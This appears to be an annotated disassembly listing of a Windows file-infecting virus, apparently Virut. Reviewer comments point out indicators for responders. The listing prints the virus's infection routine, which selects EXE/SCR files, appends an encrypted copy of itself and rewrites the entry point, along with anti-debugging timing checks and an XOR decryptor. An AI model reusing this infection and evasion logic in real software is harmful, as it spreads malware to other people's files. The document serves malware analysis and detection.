;         CF=1  no records, or the record's first four bytes are 6E69775Fh
;               ("_win" in memory order), or the aligned end of the record's
;               raw data is below the file size
;         CF=0  record accepted
; Clobbers eax, ecx.
; The "_win" comparison rejects files that already carry a section with that
; name prefix, which makes it usable as an indicator when triaging samples.
sub_31434B6C proc near ; CODE XREF: sub_31434C4B:loc_31434C9Ap ; sub_31434C4B+13Dp
        movzx ecx, word ptr [ebx+6]
        stc                                     ; default result: reject
loc_31434B71: ; CODE XREF: sub_31434B6C+23j
        jecxz short locret_31434BA8
        lea edx, [ebx+18h]
        movzx eax, word ptr [ebx+14h]
        add edx, eax
        dec ecx
        imul eax, ecx, 28h
        add edx, eax                            ; edx = record number ecx
        cmp dword ptr [edx], 6E69775Fh
        stc
        jz short locret_31434BA8
        cmp dword ptr [edx+0Ch], 1
        jb short loc_31434B71                   ; [edx+0Ch] == 0: try the previous record
        mov ecx, [ebx+3Ch]
        mov eax, [edx+14h]
        add eax, [edx+10h]
        lea eax, [eax+ecx*2-1]
        neg ecx
        and eax, ecx                            ; ([edx+14h] + [edx+10h] + 2*align - 1) masked down to a multiple of align
        cmp eax, [ebp+40396Ah]                  ; leaves CF=1 when that value is below the file size
locret_31434BA8: ; CODE XREF: sub_31434B6C:loc_31434B71j ; sub_31434B6C+1Dj ...
; Shared return for sub_31434B6C (label locret_31434BA8 is on the previous line).
        retn
sub_31434B6C endp
; =============== S U B R O U T I N E =======================================
; sub_31434BA9 -- body of the exception handler that sub_31434C4B registers.
; sub_31434C4B is entered by a `call`, and its first instructions link the
; stack slot holding that return address into the fs:[0] chain, so the handler
; address is the `call sub_31434BA9` instruction itself.
; NOTE(review): with the standard x86 handler arguments, [esp+10h] here is the
; CONTEXT pointer and +0B8h is its Eip field; popping this routine's own return
; address into it and returning 0 would resume execution at the `call $+5`
; that follows the call site.
sub_31434BA9 proc near ; CODE XREF: UPX2:31434C35p
arg_C = dword ptr 10h
        mov edx, [esp+arg_C]
        xor eax, eax
        pop dword ptr [edx+0B8h]
        retn
sub_31434BA9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; File-name filter (no proc header; entered at the `lea edi` below with esi
; pointing at a path -- NOTE(review): the entry is not referenced in this excerpt).
; Copies the path to [ebp+40384Eh] upper-casing a-z, remembering
;   ebx = start of the last component (byte after the last '\')
;   ecx = byte after the last '.' of that component (0 if none)
; and continues only when the extension is "EXE" or "SCR" and the component
; does not start with "WINC", "WCUN", "WC32" or "PSTO".
loc_31434BB6: ; CODE XREF: UPX2:31434BD7j
        mov ecx, edi
        jmp short loc_31434BC5
; ---------------------------------------------------------------------------
        lea edi, [ebp+40384Eh]
        cld
loc_31434BC1: ; CODE XREF: UPX2:31434BD3j
        mov ebx, edi
        xor ecx, ecx
loc_31434BC5: ; CODE XREF: UPX2:31434BB8j ; UPX2:31434BDBj
        lodsb
        cmp al, 61h
        jb short loc_31434BD0
        cmp al, 7Ah
        ja short loc_31434BD0
        sub al, 20h                             ; 'a'..'z' -> 'A'..'Z'
loc_31434BD0: ; CODE XREF: UPX2:31434BC8j ; UPX2:31434BCCj
        stosb
        cmp al, 5Ch                             ; '\'
        jz short loc_31434BC1
        cmp al, 2Eh                             ; '.'
        jz short loc_31434BB6
        cmp al, 0
        jnz short loc_31434BC5
        jecxz short locret_31434BA8             ; no extension: return
        mov eax, [ecx]
        cmp eax, 455845h                        ; "EXE",0
        jz short loc_31434BF3
        cmp eax, 524353h                        ; "SCR",0
        jnz locret_31434B26
loc_31434BF3: ; CODE XREF: UPX2:31434BE6j
        mov eax, [ebx]
        cmp eax, 434E4957h                      ; "WINC"
        jz locret_31434B26
        cmp eax, 4E554357h                      ; "WCUN"
        jz locret_31434B26
        cmp eax, 32334357h                      ; "WC32"
        jz locret_31434B26
        cmp eax, 4F545350h                      ; "PSTO"
        jz locret_31434B26
        xor ebx, ebx                            ; first mapping: no size growth
        call sub_31434A55
        jz locret_31434B26
        xor edx, edx                            ; edx = 0 so that fs:[edx] below is fs:[0]
        call sub_31434C4B
        call sub_31434BA9                       ; reached only as the exception handler (see sub_31434BA9)
        call $+5
        pop ebp
        sub ebp, 402F8Ah                        ; recompute the ebp variable base after an exception
        jmp loc_31434F88
; =============== S U B R O U T I N E =======================================
; sub_31434C4B -- validate the mapped file as a PE image and, if it passes,
; enlarge it, copy this program's body into it and patch its headers.
; In:   edx = 0; [ebp+403972h] = mapped view from sub_31434A55.
; Out:  none.  There is no `retn`: every path ends at loc_31434F88, which
;       removes the exception frame and falls through into sub_31434F91.
; Register roles once validation has passed: esi = mapped view, ebx = NT
; headers, edx = record chosen by sub_31434B6C (saved on the stack across the
; copy).
; Header fields written (standard PE32 offsets from ebx / from the section
; record in edx):
;   [ebx+28h] AddressOfEntryPoint (only when [ebp+4039AEh] is non-zero)
;   [ebx+50h] SizeOfImage  += [ebp+40397Ah]
;   [ebx+58h] CheckSum      = 0
;   [edx+8]   VirtualSize, [edx+10h] SizeOfRawData grown
;   [edx+24h] Characteristics |= 0E0000060h (execute/read/write, code+data)
;   [esi+20h] dword in the DOS header overwritten with [ebp+40397Eh]
; These are the on-disk artifacts a responder can check for.
; NOTE(review): sub_314337A4, sub_31433F59, sub_31432E77 and loc_314341F1 are
; not in this excerpt.  sub_314337A4 is called with a bound in eax and its
; result is read from edx, which looks like a random-number helper.
sub_31434C4B proc near ; CODE XREF: UPX2:31434C30p
var_14 = dword ptr -14h
        push dword ptr fs:[edx]                 ; link {previous frame, return address as handler} into the fs:[0] chain
        mov esi, [ebp+403972h]
        mov fs:[edx], esp
        cmp word ptr [esi], 5A4Dh               ; "MZ"
        jnz loc_31434F88
        mov ebx, [esi+3Ch]
        add ebx, esi
        cmp word ptr [ebx], 4550h               ; "PE"
        jnz loc_31434F88
        test dword ptr [ebx+16h], 2000h         ; Characteristics: skip DLLs
        jnz loc_31434F88
        test byte ptr [ebx+5Ch], 2              ; Subsystem: bit 1 must be set (true for values 2 and 3)
        mov ecx, [esi+20h]
        jz loc_31434F88
        jecxz short loc_31434C9A                ; DOS-header dword at +20h is 0: continue
        cmp ecx, 101h
        jbe loc_31434F88                        ; 1..101h: leave the file alone
loc_31434C9A: ; CODE XREF: sub_31434C4B+41j
        call sub_31434B6C
        jb loc_31434F88
        mov ecx, [edx+10h]
        add ecx, [edx+0Ch]
        mov eax, 10000h
        push ecx
        call sub_314337A4
        xor [ebp+40342Fh], dl                   ; per-file values: byte at 40342Fh is the initial key of the final loop,
        mov cl, 20h
        xor [ebp+403430h], dh                   ; byte at 403430h is one possible key step
loc_31434CC4: ; CODE XREF: sub_31434C4B+92j
        push 20h
        dec cl
        pop eax
        js short loc_31434CDF
        call sub_314337A4
        test edx, edx
        setz dl
        shl edx, cl
        xor [ebp+403431h], edx                  ; toggle bit cl of the 32-bit flag word when the helper returned 0
        jmp short loc_31434CC4
; ---------------------------------------------------------------------------
loc_31434CDF: ; CODE XREF: sub_31434C4B+7Ej ; sub_31434C4B+CDj ...
        push 6
        pop ecx
loc_31434CE5: ; CODE XREF: sub_31434C4B+B8j
        push 6
        pop eax
        call sub_314337A4
        mov al, [ebp+403429h]
        xchg al, [edx+ebp+403429h]
        mov [ebp+403429h], al                   ; swap entry 0 of the 6-byte table at 403429h with entry edx
        loop loc_31434CE5
        ; The tests below re-run the shuffle until the table satisfies the
        ; constraints implied by the chosen flag bits.
        test dword ptr [ebp+403431h], 8
        jnz short loc_31434D1A
        cmp byte ptr [ebp+40342Bh], 1
        jz short loc_31434CDF
loc_31434D1A: ; CODE XREF: sub_31434C4B+C4j
        test dword ptr [ebp+403431h], 1000003h
        jz short loc_31434D41
        cmp byte ptr [ebp+403429h], 5
        jz short loc_31434CDF
        cmp byte ptr [ebp+40342Ah], 5
        jz short loc_31434CDF
        cmp byte ptr [ebp+40342Bh], 5
        jz short loc_31434CDF
loc_31434D41: ; CODE XREF: sub_31434C4B+D9j
        test dword ptr [ebp+403431h], 80000000h
        jz short loc_31434D56
        cmp byte ptr [ebp+403429h], 2
        ja short loc_31434CDF
loc_31434D56: ; CODE XREF: sub_31434C4B+100j
        and dword ptr [ebp+4039AEh], 0
        call loc_314341F1
        call sub_31434B27                       ; sizes to add, rounded to the header alignments
        call sub_31434F91                       ; release the first mapping
        mov ebx, [ebp+403976h]
        call sub_31434A55                       ; map again, this time [ebp+403976h] bytes larger
        jz loc_31434F88
        mov esi, [ebp+403972h]
        mov ebx, [esi+3Ch]
        add ebx, esi
        call sub_31434B6C
        jb loc_31434F88
        or dword ptr [edx+24h], 0E0000060h
        mov edi, esi
        push edx
        push esi
        add edi, [edx+14h]
        add edi, [edx+10h]                      ; edi = view + PointerToRawData + SizeOfRawData (end of the record's raw data)
        test dword ptr [ebp+403431h], 10000000h
        jnz short loc_31434DBE
        lea esi, [ebp+40343Ch]
        mov ecx, [ebp+40106Dh]
        rep movsb                               ; copy [ebp+40106Dh] bytes from the buffer at 40343Ch
loc_31434DBE: ; CODE XREF: sub_31434C4B+163j
        push edi
        mov ecx, 90Fh
        lea esi, [ebp+401000h]
        rep movsd                               ; copy 90Fh dwords (243Ch bytes) starting at [ebp+401000h]
        mov cl, 0
        jecxz short loc_31434DD2
        rep movsb
loc_31434DD2: ; CODE XREF: sub_31434C4B+183j
        test dword ptr [ebp+403431h], 10000000h
        jz loc_31434E8A
        push dword ptr [ebx+28h]
        call sub_31433F59
        mov edx, [ebp+4039A6h]
        test edx, edx
        jz loc_31434E8A
        mov esi, [ebp+403972h]
        mov ecx, [edx+10h]
        or dword ptr [edx+24h], 0E0000060h
        sub ecx, [edx+8]                        ; ecx = SizeOfRawData - VirtualSize for the record in edx, clamped at 0
        jnb short loc_31434E0F
        xor ecx, ecx
loc_31434E0F: ; CODE XREF: sub_31434C4B+1C0j
        add esi, [edx+14h]
        cmp ecx, [ebp+40106Dh]
        mov ecx, [ebp+40106Dh]
        jb short loc_31434E76                   ; not enough slack for [ebp+40106Dh] bytes
        mov edi, [esp+14h+var_14]
        and dword ptr [ebp+40106Dh], 0
        and dword ptr [edi+6Dh], 0
        mov edi, [edx+8]
        add [edx+8], ecx                        ; grow VirtualSize by the bytes about to be placed in the slack
        add esi, edi
        xchg esi, edi
        mov eax, [ebp+403986h]
        test dword ptr [ebp+403431h], 40h
        jz short loc_31434E4F
        neg dword ptr [eax]
loc_31434E4F: ; CODE XREF: sub_31434C4B+200j
        add esi, [edx+0Ch]
        sub [eax], esi
        mov [ebp+4039AEh], esi                  ; value later written to [ebx+28h]
        mov esi, [ebx+28h]
        add [eax], esi
        test dword ptr [ebp+403431h], 40h
        jz short loc_31434E6D
        neg dword ptr [eax]
loc_31434E6D: ; CODE XREF: sub_31434C4B+21Ej
        push ecx
        call sub_31434B27
        pop ecx
        jmp short loc_31434E82
; ---------------------------------------------------------------------------
loc_31434E76: ; CODE XREF: sub_31434C4B+1D3j
        add esi, [ebx+28h]
        sub esi, [edx+0Ch]
        push ecx
        push esi
        rep movsb                               ; copy ecx bytes found at the [ebx+28h] location to edi before they are overwritten
        pop edi
        pop ecx
loc_31434E82: ; CODE XREF: sub_31434C4B+229j
        lea esi, [ebp+40343Ch]
        rep movsb
loc_31434E8A: ; CODE XREF: sub_31434C4B+191j ; sub_31434C4B+1A7j
        pop edi                                 ; edi = start of the 243Ch-byte copy made above
        pop esi                                 ; esi = mapped view
        rdtsc
        xchg eax, edx
        lea eax, [edi+1D2h]
        cmp dl, [ebp+40342Fh]
        jnz short loc_31434EA3
        imul edx, 12345678h
loc_31434EA3: ; CODE XREF: sub_31434C4B+250j
        mov [eax-1], dl                         ; timestamp-derived byte stored at offset 1D1h of the copy
        call sub_31432E77
        pop edx                                 ; edx = record chosen by sub_31434B6C
        mov ecx, [edx+0Ch]
        add ecx, [edx+10h]
        test dword ptr [ebp+403431h], 10000000h
        lea eax, [ecx+6]
        jnz short loc_31434ED4
        mov [ebp+4039AEh], ecx
        add eax, [ebp+40106Dh]
        and dword ptr [edi+6Dh], 0
loc_31434ED4: ; CODE XREF: sub_31434C4B+274j
        sub eax, [ebx+28h]
        push dword ptr [ebp+40397Eh]
        mov [edi+52h], eax
        pop dword ptr [esi+20h]                 ; overwrite the DOS-header dword tested at entry
        test dword ptr [ebp+403431h], 80000000h
        jz short loc_31434EF9
        push edx
        call sub_3143481F
        pop edx
loc_31434EF9: ; CODE XREF: sub_31434C4B+2A5j
        mov ecx, [ebp+4039AEh]
        jecxz short loc_31434F04
        mov [ebx+28h], ecx                      ; replace AddressOfEntryPoint
loc_31434F04: ; CODE XREF: sub_31434C4B+2B4j
        mov ecx, [edx+10h]
        mov eax, [ebp+403976h]
        cmp [edx+8], ecx
        jnb short loc_31434F15
        mov [edx+8], ecx                        ; VirtualSize = max(VirtualSize, SizeOfRawData)
loc_31434F15: ; CODE XREF: sub_31434C4B+2C5j
        add [edx+10h], eax
        and dword ptr [ebx+58h], 0              ; CheckSum = 0
        mov eax, [ebp+40397Ah]
        push 243Ch
        add [edx+8], eax
        pop ecx                                 ; ecx = 243Ch bytes for the loop below
        add [ebx+50h], eax
        mov dl, [ebp+40342Fh]                   ; dl = running key
        test dword ptr [ebp+403431h], 10000000h
        jz short loc_31434F46
        add ecx, [ebp+40106Dh]
loc_31434F46: ; CODE XREF: sub_31434C4B+2F3j
        mov dh, 0                               ; dh = key step: 0, 1, or the byte at 403430h, by flag bits
        test dword ptr [ebp+403431h], 20000h
        jnz short loc_31434F68
        inc dh
        test dword ptr [ebp+403431h], 40000h
        jnz short loc_31434F68
        mov dh, [ebp+403430h]
loc_31434F68: ; CODE XREF: sub_31434C4B+307j ; sub_31434C4B+315j
        test dword ptr [ebp+403431h], 4000h
        jnz short loc_31434F7F
        ; Byte-wise transform of ecx bytes at edi: either add or xor with the
        ; running key, key += step after each byte.
loc_31434F74: ; CODE XREF: sub_31434C4B+330j
        mov al, [edi]
        add al, dl
        stosb
        add dl, dh
        loop loc_31434F74
        jmp short loc_31434F88
; ---------------------------------------------------------------------------
loc_31434F7F: ; CODE XREF: sub_31434C4B+327j ; sub_31434C4B+33Bj
        mov al, [edi]
        xor al, dl
        stosb
        add dl, dh
        loop loc_31434F7F
; Common exit: unlink the exception frame and drop the saved return address,
; then fall through into sub_31434F91.
loc_31434F88: ; CODE XREF: UPX2:31434C46j ; sub_31434C4B+11j ...
        xor edx, edx
        mov esp, fs:[edx]
        pop dword ptr fs:[edx]
        pop eax
sub_31434C4B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; sub_31434F91 -- release what sub_31434A55 acquired, in reverse order.  The
; inner labels are also the failure targets of sub_31434A55, so a partial open
; is unwound from the matching step.
; NOTE(review): API identities are inferred from argument shape only.
sub_31434F91 proc near ; CODE XREF: sub_31434C4B+11Cp
        cmp dword ptr [ebp+403956h], 0
        jz locret_31434B26                      ; nothing open
        push dword ptr [ebp+403972h]
        call dword ptr [ebp+4035C4h]            ; (view)  (UnmapViewOfFile-shaped)
loc_31434FAA: ; CODE XREF: sub_31434A55+C5j
        push dword ptr [ebp+40396Eh]
        call dword ptr [ebp+40353Ch]            ; (mapping handle)  (CloseHandle-shaped)
        lea ecx, [ebp+40395Ah]
        lea edx, [ebp+403962h]
        push ecx
        push edx
        push 0
        push dword ptr [ebp+403956h]
        call dword ptr [ebp+4035B8h]            ; (handle, 0, &[403962h], &[40395Ah])  (SetFileTime-shaped: write back the saved values)
loc_31434FD2: ; CODE XREF: sub_31434A55+6Bj ; sub_31434A55+82j ...
; Tail of sub_31434F91 (label loc_31434FD2 is on the previous line): close the
; handle in [ebp+403956h], write the value saved in [ebp+403952h] back for the
; path at [ebp+40384Eh], and zero the handle variable.
; NOTE(review): the slots are the same ones sub_31434A55 uses; the API names
; are not resolved on this page.
        push dword ptr [ebp+403956h]
        call dword ptr [ebp+40353Ch]
loc_31434FDE: ; CODE XREF: sub_31434A55+45j
        lea esi, [ebp+40384Eh]
        push dword ptr [ebp+403952h]
        push esi
        call dword ptr [ebp+4035B4h]
        and dword ptr [ebp+403956h], 0          ; also leaves ZF set, which callers of sub_31434A55 read as failure
        retn
sub_31434F91 endp
; ---------------------------------------------------------------------------
; NOTE(review): IDA left the following bytes as data, but they start with
; E8 00 00 00 00 5D (call $+5 / pop ebp) and contain the constant 5C3F3F5Ch
; ("\??\" in memory order), so this looks like code that was not disassembled.
; Convert it to code before drawing conclusions from this region.
        db 0E8h, 2 dup(0)
        dd 6A5D0000h, 49ED8101h, 58004033h, 85C10FF0h, 401580h
        dd 83C3C085h, 0FF0FFC8h, 158085C1h, 3DC30040h, 2A0010h
        dd 81661C75h, 6C0C247Ch, 60137571h, 0FFFFC4E8h, 0E80575FFh
        dd 0FFFFFB7Eh, 0FFFFD2E8h, 0FF2E61FFh, 3456782Dh, 25B812h
        dd 0E8600000h, 0FFFFFFA5h, 448B3975h, 0B58D3024h, 40384Eh
        dd 6608508Bh, 2063A81h, 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h
        dd 4035F8h, 8108C483h, 3F3F5C3Eh, 8303755Ch, 2BE804C6h
        dd 0E8FFFFFBh, 0FFFFFF7Fh, 74B8C361h, 0EB000000h, 2FB8B1h
        dd 10E80000h, 0C2000000h, 30B80020h, 0E8000000h, 3, 8D0024C2h
        dd 0CD0C2454h, 0F8832Eh, 0E860197Ch, 0
; ---------------------------------------------------------------------------
        mov edx, [esp+30h]
        pop ebp
        mov ebx, [edx]
        sub ebp, 403413h                        ; ebp = variable base, computed from the address popped above
        call sub_31433613
        popa
        retn 4
; ---------------------------------------------------------------------------
; Data area.  The dd rows are one byte out of phase with the values they hold:
; read as a byte stream, "809B4700h, 8308AD7Ch" contains 7C809B47h and
; 7C8308ADh, which the import comments at the top of this listing resolve to
; KERNEL32.CloseHandle and KERNEL32.CreateEventA.  The table therefore appears
; to hold API addresses captured from the analysis machine, not portable
; constants.
        dw 701h
        dd 5060203h, 0E8CB86D9h, 15FF6167h, 1001074h, 90h, 3Fh dup(0)
        dd 809B4700h, 8308AD7Ch, 9103317Ch, 80ADA07Ch, 7Ch, 2 dup(0)
        dd 80BDB600h, 801A247Ch, 80945C7Ch, 8023677Ch, 81042C7Ch
        dd 8106377Ch, 864B0F7Ch, 80C0587Ch, 80E7EC7Ch, 81153C7Ch
        dd 810A777Ch, 831C457Ch, 80B6A17Ch, 8608FF7Ch, 835DCA7Ch
        dd 8111DA7Ch, 812ADE7Ch, 801D777Ch, 80B9057Ch, 80BB767Ch
        dd 8309E17Ch, 863DE57Ch, 863F587Ch, 8127827Ch, 831CB87Ch
        dd 8024427Ch, 810B1C7Ch, 80B9747Ch, 809A517Ch, 810D877Ch
        dd 90D4607Ch, 90D6827Ch, 90D7547Ch, 90D7697Ch, 90D7937Ch
        dd 90DC557Ch, 90DCFD7Ch, 90DD907Ch, 90DEB67Ch, 90EA327Ch
        dd 9130C67Ch, 7Ch, 14h dup(0)
; The next rows are a counted UTF-16LE string: lengths 36h/38h, a pointer
; (3143530Ch), then the characters "\BaseNamedObjects\W32_Virtu".  A named
; kernel object under that path is a host indicator worth searching for.
        dd 380036h, 3143530Ch, 42005Ch, 730061h, 4E0065h, 6D0061h
        dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
        dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
        dd 89000000h, 0Ch dup(0)
        dd 0D9000000h, 2266h dup(0)
        db 90h ;
---------------------------------------------------------------------------
; Start-up stub.  The `call` below pushes the address of sub_3143E006 as its
; return address; sub_3143E02D uses that value as a position reference and
; never returns here in the normal sense.
        call near ptr sub_3143E02D ; CODE XREF: sub_3143E02D+55j
; =============== S U B R O U T I N E =======================================
; sub_3143E006 -- in-place word-wise XOR over a fixed-length buffer.
; In:   eax = buffer, dx = initial 16-bit key.
; Out:  eax = buffer + 2*0CBFh; CF = 0 (left by the last xor; lea, xchg, loop
;       and pop do not change it).
; Clobbers ecx, edx; ebx is saved and restored.
; Per word: xor with dx, then dx = (dx + initial key) with its two bytes
; swapped.  0CBFh words = 197Eh bytes are processed.
sub_3143E006 proc near ; CODE XREF: sub_3143E02D+50p
        push ebx
        mov ecx, 0CBFh
        mov ebx, edx                            ; keep the initial key as the per-step increment
loc_3143E00E: ; CODE XREF: sub_3143E006+13j
        xor [eax], dx
        lea edx, [ebx+edx]
        xchg dl, dh
        lea eax, [eax+2]
        loop loc_3143E00E
        pop ebx
        retn
sub_3143E006 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143E02D
; Early-out of sub_3143E02D: restore ebp and return through the return address
; that sub_3143E02D has already lowered by 0B406h.
loc_3143E01D: ; CODE XREF: sub_3143E02D+3Bj
        pop ebp
        retn
; END OF FUNCTION CHUNK FOR sub_3143E02D
; ---------------------------------------------------------------------------
; These two bytes are read as a word by `mov dx, [eax-63h]` in sub_3143E02D
; (NOTE(review): by address arithmetic from the chunk sizes IDA prints), i.e.
; they are the initial XOR key 8199h.
        db 99h
        db 81h
; =============== S U B R O U T I N E =======================================
; sub_3143E021 -- return the time-stamp counter in edx:eax.
sub_3143E021 proc near ; CODE XREF: sub_3143E02D:loc_3143E047p ; sub_3143E02D+20p
        rdtsc
        retn
sub_3143E021 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3143E02D
loc_3143E024: ; CODE XREF: sub_3143E02D+8j ; sub_3143E02D+12j ...
; Chunk body for label loc_3143E024 (on the previous line): force the
; "elapsed" value to 1000h so that the `jnb` after loc_3143E052 takes the
; early-out and the XOR pass is skipped.
        mov eax, 1000h
        xor ecx, ecx
        jmp short loc_3143E052
; END OF FUNCTION CHUNK FOR sub_3143E02D
; =============== S U B R O U T I N E =======================================
; sub_3143E02D -- start-up stub: environment and timing checks, then an XOR
; pass over the bytes that follow it.
; In:   eax, ebx = values at process start (only tested, never set here);
;       [esp] = return address pushed by the `call` at the top of the stub.
; Flow visible in this listing:
;   1. eax/ebx/cs-based checks choose between loc_3143E024 (skip) and
;      loc_3143E047 (continue).
;   2. Two rdtsc reads are subtracted; a difference of 100h or more takes the
;      early-out at loc_3143E01D.  Single-stepping or emulation between the two
;      reads would exceed that, so this acts as an anti-analysis timing check.
;   3. The saved return address is lowered by 0B406h on every path, so both the
;      early-out `retn` and any later return continue at that lower address.
;   4. Otherwise sub_3143E006 XORs 0CBFh words starting at [ebp+301082h].
; NOTE(review): IDA's cross-references place the `call sub_3143E006` at +50h
; and the following `jb` at +55h, and [ebp+301082h] works out to the same
; address as +55h, so the instructions after the call appear to be ciphertext
; that IDA decoded statically; they are not meaningful until decrypted.
sub_3143E02D proc far ; CODE XREF: UPX2:3143E001p ; FUNCTION CHUNK AT 3143E01D SIZE 00000002 BYTES ; FUNCTION CHUNK AT 3143E024 SIZE 00000009 BYTES
        test eax, eax
        jnz short loc_3143E039
        ; IDA's MS-DOS annotation on the next line is a generic one; this is a
        ; Win32 PE, so the interrupt's effect depends on the Windows version.
        int 2Ch ; Internal routine for MSDOS (IRET)
        test eax, eax
        jns short loc_3143E024
        jmp short loc_3143E047
; ---------------------------------------------------------------------------
loc_3143E039: ; CODE XREF: sub_3143E02D+2j
        mov dx, cs
        shl ebx, 0Ah
        js short loc_3143E024
        jnb short loc_3143E024
        cmp dh, bh
        jz short loc_3143E024
loc_3143E047: ; CODE XREF: sub_3143E02D+Aj
        call sub_3143E021
        xchg eax, ecx                           ; ecx = first counter reading (low dword)
        call sub_3143E021
loc_3143E052: ; CODE XREF: sub_3143E02D-2j
        neg ecx
        push ebp
        add eax, ecx                            ; eax = second reading - first reading
        mov ebp, [esp+4]                        ; ebp = return address of the call into this routine
        sub dword ptr [esp+4], 0B406h
        sub eax, 100h
        jnb short loc_3143E01D                  ; elapsed >= 100h: skip the XOR pass
        sub ebp, 301006h
        lea eax, [ebp+301082h]                  ; eax = return address + 7Ch
        mov dx, [eax-63h]                       ; 16-bit key stored 19h bytes after the return address
        call sub_3143E006
        jb short near ptr loc_3143E001+4
        mov [esi-69h], ch
        xchg eax, esp
        lahf
        scasd
        int 47h
        mov byte ptr [ecx-3290AC7Fh], 5Bh
        cdq
        sbb si, di
        pop es
        cwde
        mov ch, 37h
        retf 5B53h
sub_3143E02D endp
; ---------------------------------------------------------------------------
; High-entropy data follows and continues past this line; presumably more of
; the region that sub_3143E006 rewrites at run time.
        dw 711h
        dd 2D75BF37h, 0FB92125Ah, 0F92839B8h, 55BE6D2Dh, 0C2ABD785h
        dd 0B8B01345h, 1503FE3Ah, 4BCFFD8Bh, 2BE406Dh, 37D7FEA0h
        dd 430D7EE2h, 756113B8h, 96E32F4Bh, 37F3CDECh, 0CBE16DDAh
        dd 929E3D4Dh, 7565F524h, 7443DDC7h, 0C64FCAEEh, 0C6B11AE5h
        dd 5AA80954h, 8590F3ECh, 0D2F43607h, 0DEA53147h, 0B88E1C78h
        dd 0A205C52Ch, 8EA9488Dh, 250B9389h, 3F56D84Eh, 361DACC0h
        dd 15C46FA8h, 0EACB4198h, 7C3E1311h, 0EFDADFA5h, 0C21D7477h
        dd 7E0F8E66h, 0F3AEA7BCh, 7FBA3C68h, 63694B4Fh, 0A3FEF9FAh
        dd 7D7691EAh, 3C332F00h, 0B4FA5C63h, 0B341E036h, 0EAFE4D44h
        dd 109932EFh, 4834B2B6h, 2B324866h, 0DA6BE88Ah, 5EAF0E60h
        dd 3A1593F0h, 97BA091Eh, 0A269DEEFh, 6BEE5D6Bh, 0F10E6F7Fh
        dd 8F7CA176h, 192B8D2Dh, 592CD6AAh, 0C88BF2AEh, 78BF278Eh
        dd 81EA9FF5h,
0BBF5CEEBh, 4C575D00h, 0E4C86279h, 5A91968Dh dd 191DBEB2h, 52DD399Ah, 8C63D19Eh, 0E371E326h, 8299173Dh dd 0F7A7758Fh, 0D00E4F5Fh, 0DBE7763Ah, 0C41405DCh, 8B749A5Fh dd 4837B5D7h, 9DC72FA3h, 0D36DDB97h, 360C0918h, 1BA321F0h dd 0B7BD8983h, 2D5C5619h, 0DDF6D1FDh, 0F8E60B5Fh, 9F269469h dd 1C504206h, 0B9F929ADh, 409B7625h, 73F8EC69h, 1BF4EBCEh dd 81DDDD8Dh, 474A9333h, 0F7ACF3B2h, 550AD397h, 1D31ACEBh dd 23D9359Dh, 0D367D59Dh, 0AB072016h, 84659FE2h, 0CB203608h dd 0D4D03A23h, 57EB6E3Eh, 0F3058431h, 19B56173h, 0A33B89A7h dd 9BD2DB67h, 3071EFC3h, 75E45ADCh, 0FAA721F7h, 0A7298112h dd 96DA307Ah, 0E0F57520h, 0E99A7163h, 7E2A9857h, 3044C39Dh dd 60754B4Eh, 6193F9FBh, 969614E6h, 9AB02DABh, 56934976h dd 2FEE093Dh, 0DBD4E4C7h, 0C5E87C6Dh, 0A0D0F04h, 354FCD91h dd 5468653Fh, 6F83EBD6h, 0DEEE1EF1h, 0A5F67548h, 0EA85C6D8h dd 6E636D72h, 0F63890F7h, 0ADAE6844h, 2A0E9638h, 0ACCADA1Ah dd 5E74F001h, 5356B063h, 9BAA28CBh, 0AFC61A92h, 675BD631h dd 1AF84766h, 859C9017h, 1A1E85ECh, 1D247A1Ah, 0B19BE285h dd 0EF70FDCFh, 839A1AD0h, 0B475B68Eh, 0C9314D10h, 6E6DE83Ah dd 6E02B17Fh, 393421CDh, 23C7498Ah, 26D4DEA4h, 0DC6EECBCh dd 42A3B65Ch, 8CD4DDF4h, 817FB880h, 7E59571Ah, 0DEC25884h dd 0F90C749Fh, 12DB2275h, 0A0C9C094h, 476DF11Bh, 1087EF2Bh dd 0B2169EE2h, 16AE1CD7h, 82E189A4h, 0CD1D9E34h, 337B744Fh dd 0EB17956Bh, 1D32B162h, 1C627613h, 9EE3E688h, 0B57501B9h dd 49A6C11h, 0E2D234E8h, 0D785A827h, 55F4013Fh, 0C31312EFh dd 0D3D2674h, 23B1BA8Eh, 0BEA82BE5h, 0D6D9963Dh, 768D46D9h dd 3ACE26F8h, 7C6069Eh, 0A170BF1Ch, 690D97E2h, 9510E5B0h dd 172BF7FDh, 312C0813h, 4B0B1B39h, 657CFAA4h, 0D1D77FEFh dd 0CBBF5A50h, 9C72DFE2h, 52BD6408h, 6F973E97h, 8C1A9830h dd 0AA35D95Ch, 5154A46Eh, 76983BCh, 0F3EE04BDh, 0E1A11FACh dd 59D16B0Dh, 7C40AB78h, 83EF5E69h, 0F8F60D07h, 11259FFCh dd 2B8A3092h, 0FC5AE8BCh, 5F75F467h, 0DF63E16Ah, 85ABC47Dh dd 35484427h, 0CBEF4A34h, 737498B2h, 1248B56h, 6ABA52D0h dd 0DD4AF8B6h, 4F65E3A0h, 2EF919Ch, 0F6CB699Eh, 0F3DC426Fh dd 0ECAA2944h, 0B09C045Dh, 0F538216h, 3A3491E4h, 35BC3E8Bh dd 6E54E28Fh, 
